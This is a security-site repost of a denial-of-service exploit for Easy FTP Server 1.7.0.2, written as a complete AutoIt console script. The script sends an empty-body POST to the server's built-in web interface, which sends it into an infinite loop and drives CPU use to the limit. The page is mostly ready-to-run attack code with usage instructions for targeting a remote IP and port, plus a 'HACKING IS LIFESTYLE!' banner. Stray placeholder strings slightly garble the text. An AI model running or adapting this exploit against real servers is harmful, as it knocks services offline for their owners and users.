首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Easy FTP Server 1.7.0.2 Denial Of Service
来源:vfocus.net 作者:Akastep 发布时间:2013-04-08  
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Outfile=smdcpu.exe
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include "WinHttp.au3"
#include <String.au3>

#cs

easyftpsvr-1.7.0.2 CPU consumption exploit.
The vulnerability is due easyftpsvr-1.7.0.2 's web interface (Easy-Web Server/1.0) contains flaw when accepting 
___FCKpd___0
POST requests with EMPTY body. In this case application runs into infinitve loop and consumes very high CPU usage. Running following exploit 2-3 times against target machine that runs easyftpsvr-1.7.0.2 (against it native web interface called Easy-Web Server/1.0) consumes high CPU usage. ---------------- Be Carefull! ----------------- *DO not run it against your real machine.(Instead of use Virtualbox)* Otherwise hard reboot is your best friend. Demo vid: http://youtu.be/fq1ebZGkoJM ------------------------------------------------ /AkaStep #ce Opt("MustDeclareVars", 1) Global $INVALIDIP='INVALID IP FORMAT'; Global $INVALIDPORT='INVALID PORT NUMBER!'; Global $f=_StringRepeat('#',10); Global $msg_usage=$f & ' easyftpsvr-1.7.0.2 CPU consumption exploit ' & StringMid($f,1,7) & @CRLF & _ $f & " Usage: " & _ @ScriptName & ' REMOTEIP ' & ' REMOTEPORT ' & $f & @CRLF & _ StringReplace($f,'#','\') & _StringRepeat(' ',10) & _ 'HACKING IS LIFESTYLE!' & _StringRepeat(' ',10) & StringReplace($f,'#','/') if $CmdLine[0]=0 Then MsgBox(64,"easyftpsvr-1.7.0.2 CPU consumption exploit","This is a console Application!" & @CRLF & 'More Info: ' & @ScriptName & ' --help' & @CRLF & _ 'Invoke It from MSDOS!',5) exit; EndIf if $CmdLine[0] <> 2 Then ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF); exit; EndIf ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF); Global $ipaddr=StringMid($CmdLine[1],1,15);//255.255.255.255 Global $port=StringMid($CmdLine[2],1,5);//65535 Global $useragent='Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0'; Global $reqmethod='POST'; global $root_dir='/'; Global $thisconsumes='';//<=This is a reason of High CPU consumption. Empty
___FCKpd___0
POST body causes application to run into infinitve loop// Global $hOpen = _WinHttpOpen($useragent); Global $hConnect = _WinHttpConnect($hOpen, $ipaddr,$port) Global $hRequest = _WinHttpOpenRequest($hConnect,$reqmethod,$root_dir,Default,Default,''); _WinHttpAddRequestHeaders($hRequest, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" & @CRLF) _WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-US,en;q=0.5"& @CRLF) _WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate"& @CRLF) _WinHttpAddRequestHeaders($hRequest, "DNT: 1"& @CRLF) _WinHttpAddRequestHeaders($hRequest, "Connection: close"& @CRLF) _WinHttpSendRequest($hRequest, -1, $thisconsumes);// send empty
___FCKpd___0
POST body.// Global $sHeader, $sReturned If _WinHttpQueryDataAvailable($hRequest) Then $sHeader = _WinHttpQueryHeaders($hRequest) $sReturned &= _WinHttpReadData($hRequest) _WinHttpCloseHandle($hRequest) _WinHttpCloseHandle($hConnect) _WinHttpCloseHandle($hOpen) EndIf ConsoleWrite(_StringRepeat('#',62) & @CRLF & _StringRepeat(' ',10) &' PACKET WAS SENT! ' & _StringRepeat(' ',10) & @CRLF & _StringRepeat('#',62)); ConsoleWrite(@CRLF & $f & ' Run this exploit 2-3 times against target it will consume CPU deadly. ' & $f & @CRLF); Exit;

 
[推荐] [评论(1条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MediaMonkey Player v.4.0.7 Loc
·HP System Management Homepage
·Personal File Share 1.0 DoS
·VirtualDJ Pro/Home <=7.3 Buffe
·Easy DVD Player (libav) libavc
·HexChat 2.9.4 Local Exploit Su
·SmallFTPd 1.0.3 Denial Of Serv
·Google AD Sync Tool Vulnerabil
·Groovy Media Player 3.2.0 Buff
·Sysax Multi Server 6.10 - SSH
·Netgear DGN1000B setup.cgi Rem
·BigAnt Server 2.97 - DDNF User
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved